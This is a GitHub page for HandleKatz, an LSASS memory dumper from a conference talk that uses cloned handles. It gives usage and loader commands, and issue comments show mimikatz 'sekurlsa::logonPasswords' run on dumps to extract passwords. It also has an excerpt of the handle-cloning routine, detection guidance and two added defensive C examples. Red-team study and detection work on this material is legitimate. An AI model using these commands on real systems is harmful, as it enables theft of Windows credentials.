PIC lsass dumper using cloned handles

Overview

HandleKatz

This tool was implemented as part of our Brucon2021 conference talk and demonstrates the use of cloned handles to Lsass to create an obfuscated memory dump of it.

It compiles down to an executable that lives entirely in its text segment. The extracted .text segment of the PE file is therefore fully position-independent code (PIC), meaning that it can be treated like any shellcode.

The in-memory execution of HandleKatz has a very small footprint, as it does not itself allocate any additional executable memory; it can therefore be combined efficiently with concepts such as (Phantom) DLL hollowing as described by @_ForrestOrr. This is in contrast to PIC PE loaders such as Donut, SRDI or reflective loaders, which allocate more executable memory during PE loading. Additionally, it uses a modified version of the ReactOS MiniDumpWriteDumpA, built on direct system calls, to write an obfuscated dump to disk.

For detailed information please refer to the PDF file PICYourMalware.pdf in this repository.

Usage

  • make all to build HandleKatzPIC.exe, HandleKatz.bin and loader.exe

Please note that different compilers (and compiler versions) yield different results; some might produce a PE file with relocations.

All tests were carried out using x86_64-w64-mingw32-gcc, mingw-gcc version 11.2.0 (GCC). The produced PIC was successfully tested on Windows 10 Pro 10.0.17763. On other versions of Windows, API hashes might differ.

To use the PIC, cast a pointer to the shellcode in executable memory and call it according to the definition:

DWORD handleKatz(BOOL b_only_recon, char* ptr_output_path, uint32_t pid, char* ptr_buf_output);
  • b_only_recon If set, HandleKatz will only enumerate suitable handles without dumping
  • ptr_output_path Determines where the obfuscated dump will be written to
  • pid What PID to clone a handle from
  • ptr_buf_output A char pointer to which HandleKatz writes its internal output

For deobfuscation of the dump file, the script Decoder.py can be used.

Loader implements a sample loader for HandleKatz:

loader.exe --pid:7331 --outfile:C:\Temp\dump.obfuscated

Usage of HandleKatz PIC

Detection

As cloned handles are used together with modified ReactOS code, no ProcessAccess events on Lsass itself can be observed. However, ProcessAccess events on the programs that hold a handle to Lsass can be observed.

Defenders can monitor for ProcessAccess masks in which PROCESS_DUP_HANDLE (0x0040) is set to identify the usage of this tool.
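As an added example (not code from the repository), the following C program applies the rule above to constructed ProcessAccess records in the shape of Sysmon Event ID 10 and flags every record whose GrantedAccess includes PROCESS_DUP_HANDLE. The record layout, the image paths and the masks are constructed for the example; 0x440 corresponds to the PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE combination that the check_handles() issue below shows the tool requesting.

```c
#include <stdio.h>
#include <stdbool.h>
#include <stddef.h>

#define PROCESS_DUP_HANDLE 0x0040   /* the access bit the Detection section names */

/* Constructed ProcessAccess records in the shape of Sysmon Event ID 10, not real telemetry.
 * Paths contain no spaces, so the key=value layout can be read with sscanf. */
static const char *const SAMPLE_EVENTS[] = {
    "SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000",
    "SourceImage=C:\\Temp\\loader.exe TargetImage=C:\\Windows\\System32\\svchost.exe GrantedAccess=0x440",
    "SourceImage=C:\\Windows\\explorer.exe TargetImage=C:\\Windows\\System32\\notepad.exe GrantedAccess=0x1410",
    "SourceImage=C:\\Temp\\loader.exe TargetImage=C:\\Windows\\System32\\wininit.exe GrantedAccess=0x40",
};
#define SAMPLE_COUNT (sizeof SAMPLE_EVENTS / sizeof SAMPLE_EVENTS[0])

struct access_event { char source[260]; char target[260]; unsigned mask; };

/* Parse one record; false if any of the three fields is missing. %x accepts the 0x prefix. */
bool parse_event(const char *line, struct access_event *ev) {
    return sscanf(line, "SourceImage=%259s TargetImage=%259s GrantedAccess=%x",
                  ev->source, ev->target, &ev->mask) == 3;
}

bool has_dup_handle(unsigned mask) { return (mask & PROCESS_DUP_HANDLE) != 0; }

/* Count records whose mask includes PROCESS_DUP_HANDLE and copy up to max_hits of them to hits.
 * The lsass.exe record itself is not flagged: the signal is the PROCESS_DUP_HANDLE access to
 * whichever process already holds an lsass handle, which is what the Detection section describes. */
size_t find_dup_handle_access(const char *const *lines, size_t n,
                              struct access_event *hits, size_t max_hits) {
    size_t found = 0;
    for (size_t i = 0; i < n; i++) {
        struct access_event ev;
        if (!parse_event(lines[i], &ev) || !has_dup_handle(ev.mask)) continue;
        if (found < max_hits) hits[found] = ev;
        found++;
    }
    return found;
}

/* Run the rule over the constructed sample set: 0x440 and 0x40 carry the bit, 0x1000 and 0x1410 do not. */
size_t count_dup_handle_samples(void) {
    struct access_event hits[SAMPLE_COUNT];
    return find_dup_handle_access(SAMPLE_EVENTS, SAMPLE_COUNT, hits, SAMPLE_COUNT);
}

int main(void) {
    printf("%zu of %zu sample events carry PROCESS_DUP_HANDLE\n", count_dup_handle_samples(), (size_t)SAMPLE_COUNT);
    return 0;
}
```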

Credits

Comments
  • ERROR kuhl_m_sekurlsa_acquireLSA

    Hi, just a feedback on a capture: no issue when using Decode.py, but having an error when using mimikatz to get login passwords.

    mimikatz # sekurlsa::minidump toto
    Switch to MINIDUMP : 'toto'

    mimikatz # sekurlsa::logonPasswords
    Opening : 'toto' file for minidump...
    ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

    mimikatz #

    Did another capture on another computer, no error but mimikatz does fc after a while without giving results.

    For --pid: using the lsass.exe pid for the capture.

    opened by nocomp 3
  • make error adjustack.o

    Hi, just did a new pull to try to compile on Windows, getting this error now; it seems that adjustack.o is missing.

    PS C:\Users\nocomp\Documents\tools\HandleKatz> make all
    nasm -f win64 src/adjuststack.asm -o adjuststack.o
    process_begin: CreateProcess(NULL, nasm -f win64 src/adjuststack.asm -o adjuststack.o, ...) failed.
    make (e=2): Le fichier spécifié est introuvable.
    make: *** [makefile:34: adjuststack.o] Error 2
    PS C:\Users\nocomp\Documents\tools\HandleKatz> ls

    Répertoire : C:\Users\nocomp\Documents\tools\HandleKatz

    Mode   LastWriteTime      Length  Name
    d----- 22/10/2021 08:13           bin
    d----- 22/10/2021 08:13           imgs
    d----- 22/10/2021 08:13           loader
    d----- 22/10/2021 08:13           src
    -a---- 22/10/2021 08:13  953      Decoder.py
    -a---- 22/10/2021 08:13  131      extract.sh
    -a---- 22/10/2021 08:13  1398     makefile
    -a---- 22/10/2021 08:13  1551926  PICYourMalware.pdf
    -a---- 22/10/2021 08:13  3802     readme.md

    PS C:\Users\nocomp\Documents\tools\HandleKatz> ls .\src\

    Répertoire : C:\Users\nocomp\Documents\tools\HandleKatz\src

    Mode   LastWriteTime      Length  Name
    -a---- 22/10/2021 08:13  344      adjuststack.asm
    -a---- 22/10/2021 08:13  7215     ApiResolve.c
    -a---- 22/10/2021 08:13  16215    APIResolve.h
    -a---- 22/10/2021 08:13  62       chkstk_ms.asm
    -a---- 22/10/2021 08:13  23845    DumpTools.c
    -a---- 22/10/2021 08:13  3720     DumpTools.h
    -a---- 22/10/2021 08:13  140      HandleKatz.h
    -a---- 22/10/2021 08:13  4805     HandleKatzPIC.c
    -a---- 22/10/2021 08:13  4863     HandleTools.c
    -a---- 22/10/2021 08:13  261      HandleTools.h
    -a---- 22/10/2021 08:13  102      linker.ld
    -a---- 22/10/2021 08:13  7917     Misc.c
    -a---- 22/10/2021 08:13  1612     Misc.h
    -a---- 22/10/2021 08:13  31567    syscalls.asm
    -a---- 22/10/2021 08:13  1721     syscalls.h

    PS C:\Users\nocomp\Documents\tools\HandleKatz>

    opened by nocomp 2
  • make error

    Hi, just gave it a try and I am having an issue creating the exe, I guess; any tip?

    Here are the logs, hope it'll help:

    nasm -f win64 src/adjuststack.asm -o adjuststack.o
    nasm -f win64 src/chkstk_ms.asm -o chkstk_ms.o
    nasm -f win64 src/syscalls.asm -o syscalls.o
    x86_64-w64-mingw32-gcc src/ApiResolve.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o ApiResolve.o -Wl,-Tlinker.ld,--no-seh -DC2
    x86_64-w64-mingw32-gcc src/HandleKatzPIC.c -masm=intel -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o HandleKatzPIC.o -Wl,-Tlinker.ld,--no-seh -DC2
    x86_64-w64-mingw32-gcc src/Misc.c -masm=intel -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o Misc.o -Wl,-Tlinker.ld,--no-seh -DC2
    x86_64-w64-mingw32-gcc src/HandleTools.c -masm=intel -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o HandleTools.o -Wl,-Tlinker.ld,--no-seh -DC2
    x86_64-w64-mingw32-gcc src/DumpTools.c -masm=intel -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o DumpTools.o -Wl,-Tlinker.ld,--no-seh -DC2
    x86_64-w64-mingw32-ld -s adjuststack.o ApiResolve.o Misc.o HandleKatzPIC.o HandleTools.o DumpTools.o syscalls.o chkstk_ms.o -o bin/HandleKatzPIC.exe
    x86_64-w64-mingw32-ld : ne peut ouvrir le fichier de sortie bin/HandleKatzPIC.exe : Aucun fichier ou dossier de ce type
    make: *** [makefile:10 : make] Erreur 1

    br

    opened by nocomp 2
  • Handle leak in error cases in check_handles()

    The for loop processes handles for the in_pid process. It creates a couple of handles in the process (h_process, dupHandle). On any error encountered it continues the loop and overwrites those handle values, causing the handles to be leaked.

    HANDLE check_handles(PSYSTEM_HANDLE_INFORMATION handle_info, DWORD in_pid, char* ptr_output, struct fPtrs* ptr_functions) {
    
        ...
        HANDLE dupHandle = NULL, h_process = NULL, h_return = NULL;
        ...
    
        for (idx_handle = 0; idx_handle < handle_info->HandleCount; idx_handle++) {
    
            entry_info = &handle_info->Handles[idx_handle];
    
            if (in_pid && in_pid != entry_info->ProcessId)
                continue;
    
            // Checking some granted access. The internet says, NtDuplicateObject() might hang on these rights
            if (entry_info->GrantedAccess != 0x0012019f && entry_info->GrantedAccess != 0x001a019f && entry_info->GrantedAccess != 0x00120189 && entry_info->GrantedAccess != 0x00100000) {
    
                if (objectTypeInfo != NULL) {
                    ptr_functions->_VirtualFree(objectTypeInfo, 0, MEM_RELEASE);
                    objectTypeInfo = NULL;
                }
    
                uPid.UniqueProcess = entry_info->ProcessId;
                uPid.UniqueThread = 0;
    
    !            NtOpenProcess(&h_process, PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE, &ObjectAttributes, &uPid);   <<<< overwrites any previous h_process handle
    !            NtDuplicateObject(h_process, (HANDLE)(uint64_t)entry_info->Handle, NtCurrentProcess(), &dupHandle, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, 0);   <<<<  overwrites previous dupHandle value
    
                objectTypeInfo = (POBJECT_TYPE_INFORMATION)ptr_functions->_VirtualAlloc(0, 0x1000, MEM_COMMIT, PAGE_READWRITE);
                if (objectTypeInfo == NULL)
                    continue;
    
                status = NtQueryObject(dupHandle, (OBJECT_INFORMATION_CLASS)ObjectTypeInformation, objectTypeInfo, 0x1000, NULL);
                if (!NT_SUCCESS(status)){
    !                continue;      <<< dupHandle, h_process leaked as they get overwritten on the next iteration
                }
    
                if (ptr_functions->_strcmpW(objectTypeInfo->TypeName.pBuffer, str_process))
    !                continue;      <<< dupHandle, h_process leaked as they get overwritten on the next iteration
    
                if (!ptr_functions->_GetModuleFileNameExA(dupHandle, NULL, handle_name, MAX_PATH))
    !                continue;      <<< dupHandle, h_process leaked as they get overwritten on the next iteration
    
                if (!ptr_functions->_GetProcessImageFileNameA(h_process, process_path, MAX_PATH))
    !                continue;      <<< dupHandle, h_process leaked as they get overwritten on the next iteration
    
                ....
            }
    
        }
    
        if (h_process != NULL)
            ptr_functions->_CloseHandle(h_process);

        if (objectTypeInfo != NULL)
            ptr_functions->_VirtualFree(objectTypeInfo, 0, MEM_RELEASE);
    
        return h_return;
    
    }
    

    See https://github.com/codewhitesec/HandleKatz/blob/5e18f107694aaeb591c10fa9ec392cf9a7c1bf2b/src/HandleTools.c#L75 and related

    opened by JohnLaTwC 1
  • makefile: Build everything (including loader demo) from source

    I wanted to build everything from source before kicking it around in our detection lab. The changes should make the Makefile a bit more robust, too.

    Thanks for the great work. Really looking forward to seeing variants of this in the wild again soon. ;-)

    opened by hillu 1
  • Update DumpTools.c

    On Windows 11 there is a problem that, most of the time, the dumping code does not work when compiled to PIC.

    The fix is to set nstreams to 6 instead of 3.

    With this fix Handlekatz should work again for Win11 :).

    opened by theLangsam 0
  • Help With running on Windows Server 2008

    Hello! I tried running it on Windows 10, and it's working perfectly, so I decided to run it also on other OS. I took Windows Server 2008 R2 (6.1.7601) and tested it on it. I don't know why, but it's crashing :(. After a bit of debugging the code I saw that it's crashing in getDllBase, and the crash is because dll_name->pBuffer is 0x400.

    Why should it not work on Windows Server 2008? And how can I 'patch' it so it will work? Looks like all the DLLs are existing...

    Thank you !

    opened by DavidSMoore11 4
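A simulation of the leak pattern described in the check_handles() issue above, added here as an example and not code from the repository: a constructed handle table stands in for the kernel's, so the reported loop and a corrected loop can be compared by counting what stays open after a scan. The names open_sim, close_sim, scan_leaky, scan_fixed and open_after are assumptions of this example, and "usable" stands for the type-name and image-name checks of the original.

```c
#include <stdbool.h>
#include <stddef.h>

/* Constructed stand-in for a handle table (1 = open, 0 = free); no Windows API is involved. */
#define MAX_HANDLES 64
static int g_table[MAX_HANDLES];

static int open_sim(void) {                    /* returns a 1-based handle, 0 means failure/NULL */
    for (int i = 0; i < MAX_HANDLES; i++)
        if (!g_table[i]) { g_table[i] = 1; return i + 1; }
    return 0;
}
static void close_sim(int h) { if (h > 0 && h <= MAX_HANDLES) g_table[h - 1] = 0; }
static void reset_table(void) { for (int i = 0; i < MAX_HANDLES; i++) g_table[i] = 0; }
int open_count(void) { int n = 0; for (int i = 0; i < MAX_HANDLES; i++) n += g_table[i]; return n; }

/* One entry to examine; "usable" stands for the type-name and image-name checks in check_handles(). */
struct entry { bool usable; };

/* Pattern reported in the issue: h_process and dupHandle are reopened on every iteration, each failed
 * check leaves with continue, and only the h_process of the last iteration is closed after the loop. */
int scan_leaky(const struct entry *e, size_t n) {
    int h_process = 0, dup = 0, h_return = 0;
    for (size_t i = 0; i < n; i++) {
        h_process = open_sim();        /* overwrites a still-open h_process from the previous round */
        dup = open_sim();              /* same for dupHandle */
        if (!e[i].usable) continue;    /* both handles of this round are now unreachable */
        if (!h_return) h_return = dup;
    }
    if (h_process) close_sim(h_process);
    return h_return;
}

/* Fixed pattern: the handles of the current iteration are released on every path, and only the
 * handle that is actually returned stays open. */
int scan_fixed(const struct entry *e, size_t n) {
    int h_return = 0;
    for (size_t i = 0; i < n; i++) {
        int h_process = open_sim();
        int dup = open_sim();
        if (e[i].usable && !h_return) h_return = dup; else close_sim(dup);
        close_sim(h_process);
    }
    return h_return;
}

/* Constructed input: four entries, only the second one passes the checks. */
static const struct entry SAMPLE_ENTRIES[] = { {false}, {true}, {false}, {false} };

/* Open handles left behind after a scan: 1 is the returned handle, anything above it is leaked. */
int open_after(int (*scan)(const struct entry *, size_t)) {
    reset_table();
    scan(SAMPLE_ENTRIES, sizeof SAMPLE_ENTRIES / sizeof SAMPLE_ENTRIES[0]);
    return open_count();
}
```

With the four constructed entries, scan_leaky leaves seven handles open (eight opened, one closed) while scan_fixed leaves only the returned one.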
Owner
CODE WHITE GmbH